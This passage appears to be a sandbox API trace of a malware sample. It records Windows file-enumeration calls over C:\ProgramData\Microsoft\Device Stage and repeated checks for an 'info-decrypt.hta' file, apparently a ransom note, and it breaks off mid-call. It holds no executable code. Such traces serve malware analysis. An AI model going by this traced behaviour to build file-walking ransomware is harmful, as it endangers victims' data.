lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.716] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.716] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Device", cAlternateFileName="")) returned 1 [0133.716] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Task", cAlternateFileName="")) returned 1 [0133.716] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Task", cAlternateFileName="")) returned 0 [0133.716] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0133.716] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0133.716] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f42c) returned 1 [0133.717] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage", nBufferLength=0x105, lpBuffer=0x691ef34, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage", lpFilePart=0x0) returned 0x25 [0133.717] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\", nBufferLength=0x105, lpBuffer=0x691ef08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\", lpFilePart=0x0) returned 0x26 [0133.717] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\*", lpFindFileData=0x691f154 | out: lpFindFileData=0x691f154*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.717] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.717] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Device", cAlternateFileName="")) returned 1 [0133.717] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd98f9f8, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd98f9f8, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Task", cAlternateFileName="")) returned 1 [0133.717] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f164 | out: lpFindFileData=0x691f164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0133.718] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3ec) returned 1 [0133.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3f8) returned 1 [0133.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0133.718] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device", lpFilePart=0x0) returned 0x2c [0133.718] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\", lpFilePart=0x0) returned 0x2d [0133.718] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.740] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.741] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{113527a4-45d4-4b6f-b567-97838f1b04b0}", cAlternateFileName="{11352~1")) returned 1 [0133.741] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 1 [0133.742] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 0 [0133.742] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0133.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0133.742] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f3dc) returned 1 [0133.742] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device", nBufferLength=0x105, lpBuffer=0x691eee4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device", lpFilePart=0x0) returned 0x2c [0133.742] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\", nBufferLength=0x105, lpBuffer=0x691eeb8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\", lpFilePart=0x0) returned 0x2d [0133.742] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x691f104 | out: lpFindFileData=0x691f104*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.743] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.743] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{113527a4-45d4-4b6f-b567-97838f1b04b0}", cAlternateFileName="{11352~1")) returned 1 [0133.743] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 1 [0133.743] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f114 | out: lpFindFileData=0x691f114*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0133.743] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f39c) returned 1 [0133.743] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f3a8) returned 1 [0133.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0133.744] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpFilePart=0x0) returned 0x53 [0133.744] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpFilePart=0x0) returned 0x54 [0133.744] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.751] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.751] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f07a66f, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f07a66f, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76b3ce5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x0, cFileName="background.png", cAlternateFileName="")) returned 1 [0133.751] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7c5b0d9, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0xc7c5b0d9, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0xc7c5b0d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb61, dwReserved0=0x0, dwReserved1=0x0, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0133.751] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f07a66f, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f07a66f, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76b3ce5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xadc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="device.png", cAlternateFileName="")) returned 1 [0133.751] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0a07cc, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0a07cc, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76d9e43, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="overlay.png", cAlternateFileName="")) returned 1 [0133.752] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0c6929, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0c6929, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76d9e43, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="superbar.png", cAlternateFileName="")) returned 1 [0133.752] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0133.752] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0133.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0133.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0133.752] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpFilePart=0x0) returned 0x53 [0133.752] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpFilePart=0x0) returned 0x54 [0133.752] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0133.754] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0133.754] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f07a66f, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f07a66f, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76b3ce5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x0, cFileName="background.png", cAlternateFileName="")) returned 1 [0133.754] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7c5b0d9, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0xc7c5b0d9, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0xc7c5b0d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb61, dwReserved0=0x0, dwReserved1=0x0, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0133.754] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f07a66f, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f07a66f, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76b3ce5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xadc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="device.png", cAlternateFileName="")) returned 1 [0133.754] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0a07cc, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0a07cc, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76d9e43, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="overlay.png", cAlternateFileName="")) returned 1 [0133.755] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0c6929, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0c6929, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76d9e43, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="superbar.png", cAlternateFileName="")) returned 1 [0133.755] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0c6929, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0c6929, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76d9e43, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="superbar.png", cAlternateFileName="")) returned 0 [0133.755] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0133.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0133.756] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0133.816] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", lpFilePart=0x0) returned 0x62 [0133.816] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta", lpFilePart=0x0) returned 0x64 [0133.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0133.816] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, 